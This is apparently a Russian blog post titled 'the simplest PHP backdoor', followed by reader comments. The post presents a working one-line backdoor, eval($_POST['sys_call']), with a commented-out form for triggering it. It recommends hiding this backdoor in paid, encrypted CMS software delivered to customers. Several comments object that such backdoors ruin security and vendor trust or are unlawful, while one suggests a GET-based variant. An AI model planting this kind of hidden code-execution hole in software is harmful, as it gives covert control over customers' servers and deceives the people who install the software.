Простейший backdoor на php

    Бэкдоры нужны не только мстящим бывшим сотрудникам, влезшим через загрузку аватара хакерам, но и в обычном процессе поставки платной зашифрованной Zend'ом или IonCube'ом CMSки. Помоему самый лучший backdoor выглядит примерно так:
    eval($_POST['sys_call']);
    //echo '<form method="POST"><textarea name="sys_call"></textarea><input type="submit"></form>';
    

    Конечно тут могут быть вариации с проверкой IP или домена «палача», и более сложные защиты от третьих лиц.
    Оригинал

    Комментарии 15

      0
      Именно из за таких подходов "Гоголевских" программистов и образуются разные команды типа nulled. Только в данном случаи стать Тарасом Бульбой может каждый кто способен вскрыть zend или ioncube.
        +1
        Я вам о дверях, а вы мне о замках.
        0
        А в чем прикол...
        Объясните?
          0
          Очевидно что выполнение произвольного кода по запросу
          0
          А почему не сделать сразу eval($_GET['SearchText']);

          Zend дезендится, IonCube декубируется, бекдоры в php-скриптах — это большая подстава для производителя софта, т.к. после его обнаружения доверие к производителю падает ниже плинтуса, а если этим кто-нибудь еще и воспользоваться сможет, то можно и на баблос попасть.
            0
            Если есть большая вероятность того что клиент недобросовесный и нарушает лицензию, то каким-то образом надо прекращать услуги. Силой.
            Например Бирман пишет о своём движке ( http://blogengine.ru/license/ ) следующее
            4.Я имею право в любых целях воспользоваться встроенными в систему бекдорами в случае несоблюдения вами условий данной лицензии.
              0
              "я имею право застрелить вас в случае несоблюдения вами условий данной лицензии"
                0
                Я думаю это будет противоречить законодательству вашей страны, следовательно не будет правомочным
                  +1
                  а я как раз тонко намекаю, что пункт о бэкдорах тоже противоречит
                0
                А суды тогда для чего придумали ? Если клиент недобросовестный, то максимум что должен сделать backdoor - это сообщить о факте нарушения лицензиии разработчикам, и дальше с нарушителем разбирается суд. Это гораздо цивилизованней и:
                1. не снижает безопасности приложения
                2. пара таких процессов дает понять клиентам, что их финансовые потери в случае недобросовестного использования могут быть гораздо больше, чем легальное использование продуктов.
                3. репутация разработчиков уж точно никак страдать не будет
                  0
                  Если софт дешёвый, то по судам не рентабельно ходить.
                  А если софт дорогой, то и шифровать код врядли надо - на это действительно есть контракты.
                    +1
                    В случае дешевого кода вообще не понятно зачем заморачиваться над чем либо. Обычно этот код дешев в силу того, что разрабатывается разработчиком практически без напряжения и очень быстро, в этом случае - жалеть нечего. А если это говнокод, написанный черти как - то тогда вообще непонятно, кто еще остался в дураках: клиент или заказчик. Да и вообще - зачем писать дешевый код, если вам потом его так жалко ? :) Пишите лучше сразу дорогой :)
              0
              А зачем это вообще? :)
              Достаточно в документации дойти до функции eval.
              Или это гениально и я просто чего-то не понимаю ?
                +1
                Для меня eval было открытием
                  0
                  Ну ладно, может и правда для кого-то это тоже будет открытием.

              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

              Самое читаемое